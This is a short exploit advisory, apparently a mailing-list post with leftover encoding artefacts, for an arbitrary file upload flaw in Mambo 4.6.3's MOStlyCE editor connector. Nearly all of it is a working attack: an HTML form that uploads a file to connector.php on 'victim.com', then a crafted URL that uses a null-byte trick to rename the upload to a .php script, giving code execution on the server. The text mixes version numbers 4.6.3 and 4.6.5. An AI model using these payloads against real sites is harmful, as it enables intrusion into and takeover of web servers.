Mambo 4.6.3 arbitrary file upload

Step 1) Using post method send file to:

http://victim.com/mambo4.6.5/mambots/editors/mostlyce/jscripts/tiny_mce/fil=
emanager/connectors/php/connector.php?Command=3DFileUpload

file should have one of the following extensions:
zip, doc, xls, pdf, rtf, csv, jpg, gif, jpeg, png, avi, mpg, mpeg, swf, fla

POC:
<form action=3D"http://victim.com/mambo4.6.5/mambots/editors/mostlyce/jscri=
pts/tiny_mce/filemanager/connectors/php/connector.php?Command=3DFileUpload"
method=3D"post" enctype=3D"multipart/form-data">
  <input type=3D"file" name=3D"NewFile"></input>
  <input type=3D"submit" value=3D"submit"></input>
</form>

Step 2) Using known bug in this version of mambo rename that file.

POC:
http://victim.com/mambo4.6.3/mambots/editors/mostlyce/jscripts/tiny_mce/fil=
emanager/connectors/php/connector.php?Command=3DFileUpload&file=3Da&file[Ne=
wFile][name]=3Dmyscript.php%00.jpg&file[NewFile][tmp_name]=3D/home/victim/v=
ictim.com/UserFiles/File/abc.gif&file[NewFile][size]=3D1&CurrentFolder=3D


path to "UserFiles" you can get using another known bug which is
described here:
http://www.securityfocus.com/archive/1/archive/1/487128/100/200/threaded